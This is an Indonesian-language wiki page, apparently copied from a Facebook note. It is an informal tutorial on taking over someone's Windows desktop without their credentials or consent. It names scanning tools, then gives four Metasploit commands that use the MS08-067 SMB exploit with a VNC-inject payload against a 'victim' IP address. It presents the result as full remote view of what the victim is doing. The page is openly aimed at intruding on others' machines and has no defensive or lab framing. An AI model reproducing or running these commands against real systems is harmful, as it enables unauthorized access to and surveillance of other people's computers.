Remote Desktop Tanpa Menyentuh Komputer yg Di remote

From SpeedyWiki

Jump to: navigation, search

Sumber: http://www.facebook.com/note.php?note_id=168565319842428

Remote desktop tanpa setting kedua komputernya dengan exploit,,,wahhhh gimana caranya tuh,,,bisa kok,,masa sih, setau ane kalo mau remote desktop agak ribet, setting sana sini,,maksudnya setting di komputer yg mau di remote dan memberikan hak akses buat komputer untuk yg mau ngeremote,,tapi kali ini tidak brooo,,kita gak perlu repot-repot minta username password dan settingan settingan segala macem lah,,cukup dengan exploitasi, kita bisa ngeliat korban lagi ngapain,,OK langsung saja deh,,

Peralatannya adalah, seperti biasa brooo, 3 aja:

  1. Angry IP Scanner
  2. Nmap
  3. Metasploit

Tuh ketiganya wajib....hwhwhhwhwhw...

Pertama buka aja angry ip scannernya dan scan, caranya ada di tutorial sebelumnya,,liat ajee di note,,ada kok caranya buat cara ngegunain angry ipscanner,,

Kedua buka Nmap, nmap juga caranya sama kayak yg di note sebelumnya, buka aja note gw,,

Yg ketiga adalah exploitnya,,Kali ini kita pake terminal/console,,buka terminalnya,,lalu ketik “msfconsole”, maka akan seperti gambar berikut ini:

Setelah kebuka, lalu ketik perintah seperti dibawah ini :

use exploit/windows/smb/ms08_067_netapi
set payload windows/vncinject/bind_tcp
set rhost ipaddress_korban
exploit

OK cukup 4 baris diatas ajah, tampak seperti gambar dibawah ini:

Setelah itu tunggu prosesnya sekitar 10 detikan,, jeng.... jeng.... jeng....maka akan keluar deh tampilan komputer korban full akses di komputer pinguin kita,,screenshotnya seperti ini:


[edit] Referensi

[edit] Pranala Menarik

Personal tools